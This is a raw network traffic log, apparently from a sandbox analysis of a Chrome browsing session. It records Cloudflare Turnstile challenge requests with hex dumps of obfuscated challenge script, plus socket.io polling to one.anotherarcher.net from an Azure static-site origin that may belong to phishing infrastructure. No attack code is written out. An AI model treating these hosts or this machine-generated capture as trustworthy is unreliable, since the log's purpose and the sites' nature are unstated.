                                                                                                                                                                                                                                CF-RAY: 8ccfd7eb5e9ac356-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 26 00 00 00 55 08 02 00 00 00 aa e9 01 96 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR&UIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                49192.168.2.449810104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:14 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: BZO5NYUjS6mrvHcO4Fb+CMY3w5cJcj0JC4M=$IY3tsa9Tjc3amP96
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7ebce19c341-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                50192.168.2.44980879.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB2ZG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                51192.168.2.44981179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB1pJ HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 51 6e 55 42 41 38 73 64 4a 34 6d 4b 76 6d 65 47 41 41 4e 54 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"QnUBA8sdJ4mKvmeGAANT","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                52192.168.2.44981279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:14 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB29w&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                53192.168.2.44981379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB2AG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                54192.168.2.449814104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwa HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7ef9b3ec32f-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 26 00 00 00 55 08 02 00 00 00 aa e9 01 96 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR&UIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                55192.168.2.449815104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccfd7c5dee932f4/1727989031975/c050b6afae937e31e19da54d9e98b8287ddc08ae038e1fc794032090cb2b1a09/DmZznhDpVk2y9G8 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 46 43 32 72 36 36 54 66 6a 48 68 6e 61 56 4e 6e 70 69 34 4b 48 33 63 43 4b 34 44 6a 68 5f 48 6c 41 4d 67 6b 4d 73 72 47 67 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwFC2r66TfjHhnaVNnpi4KH3cCK4Djh_HlAMgkMsrGgkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1INData Raw: 4a
                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                56192.168.2.449816104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7ea7f73238a&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:15 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 113780
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7f05bfb43be-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30
                                                                                                                                                                                                                                Data Ascii: -support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","human_button_text":"Verify%20you%20are%20human","check_delays":"Verification%20
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 38 33 33 38 38 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 30 31 33 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 5a 6b 73 42 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 48 70 58 79 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 71 4b 46 70 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4e 70 6c 52 4f 27 3a 67 4a 28 36 39 34 29
                                                                                                                                                                                                                                Data Ascii: reak;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,833886),eM=this||self,eN=eM[gI(1013)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'ZksBN':function(h,i){return h+i},'HpXyq':function(h,i){return h==i},'qKFpk':function(h,i){return h<i},'NplRO':gJ(694)
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 5b 67 4c 28 38 33 36 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 64 5b 67 4c 28 31 32 39 34 29 5d 28 4a 2c 69 5b 67 4c 28 31 36 38 37 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 67 4c 28 38 32 34 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 36 30 31 29 5d 5b 67 4c 28 31 36 32 39 29 5d 5b 67 4c 28 31 37 38 32 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 36 30 31 29 5d 5b 67 4c 28 31 36 32 39 29 5d 5b 67 4c 28 31 37 38 32 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 64 5b 67 4c
                                                                                                                                                                                                                                Data Ascii: [gL(836)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;d[gL(1294)](J,i[gL(1687)]);J+=1)if(K=i[gL(824)](J),Object[gL(1601)][gL(1629)][gL(1782)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[gL(1601)][gL(1629)][gL(1782)](x,L))C=L;else for(M=d[gL
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 67 4c 28 31 38 31 38 29 5d 28 67 4c 28 38 39 39 29 2c 67 4c 28 36 30 34 29 29 29 72 65 74 75 72 6e 20 64 5b 67 4c 28 31 33 31 37 29 5d 28 27 6f 2e 27 2c 4f 29 3b 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4f 7c 48 3c 3c 31 2c 64 5b 67 4c 28 38 33 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 31 37 33 31 29 5d 28 64 5b 67 4c 28 37 38 32 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 67 4c 28 31 31 37 30 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 67 4c 28 31 32 31 34 29 5d 28 48 3c 3c 31 2c 4f 26 31 2e 39 36 29 2c 49 3d 3d 64 5b 67 4c 28 31 35 33 36 29 5d 28 6a 2c
                                                                                                                                                                                                                                Data Ascii: :I++,O>>=1,s++);}else if(d[gL(1818)](gL(899),gL(604)))return d[gL(1317)]('o.',O);else{for(O=1,s=0;s<F;H=O|H<<1,d[gL(836)](I,j-1)?(I=0,G[gL(1731)](d[gL(782)](o,H)),H=0):I++,O=0,s++);for(O=C[gL(1170)](0),s=0;16>s;H=d[gL(1214)](H<<1,O&1.96),I==d[gL(1536)](j,
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 31 3b 49 21 3d 4e 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 67 4f 28 37 38 32 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 50 3d 65 28 4d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 48 3d 43 5b 33 5d 3d 50 2c 47 5b 67 4f 28 31 37 33 31 29 5d 28 50 29 3b 3b 29 69 66 28 64 5b 67 4f 28 31 31 34 32 29 5d 28 64 5b 67 4f 28 35 33 33 29 5d 2c 67 4f 28 31 31 37 38 29 29 29 7b 69 66 28 4c 3e 6a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 67 4f 28 31 32 33 39 29 5d 28 32 2c 46 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 64 5b 67 4f 28 36 31 34 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28
                                                                                                                                                                                                                                Data Ascii: 1;I!=N;O=J&K,K>>=1,K==0&&(K=o,J=d[gO(782)](s,L++)),M|=(0<O?1:0)*I,I<<=1);P=e(M);break;case 2:return''}for(H=C[3]=P,G[gO(1731)](P);;)if(d[gO(1142)](d[gO(533)],gO(1178))){if(L>j)return'';for(M=0,N=Math[gO(1239)](2,F),I=1;N!=I;O=d[gO(614)](J,K),K>>=1,K==0&&(
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 68 32 29 7b 68 32 3d 68 31 2c 65 4d 5b 65 5b 68 32 28 35 39 33 29 5d 5d 26 26 28 65 4d 5b 68 32 28 38 36 32 29 5d 5b 68 32 28 31 34 37 32 29 5d 28 29 2c 65 4d 5b 68 32 28 38 36 32 29 5d 5b 68 32 28 31 36 34 35 29 5d 28 29 2c 65 4d 5b 68 32 28 31 35 37 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 32 28 31 35 30 30 29 5d 5b 68 32 28 39 32 39 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 32 28 31 37 35 33 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 32 28 31 34 37 35 29 5d 5b 68 32 28 35 33 31 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 32 28 36 34 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 32 28 31 34 37 35 29 5d 5b 68 32 28 35 33 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 32 28 31 34 37 35 29
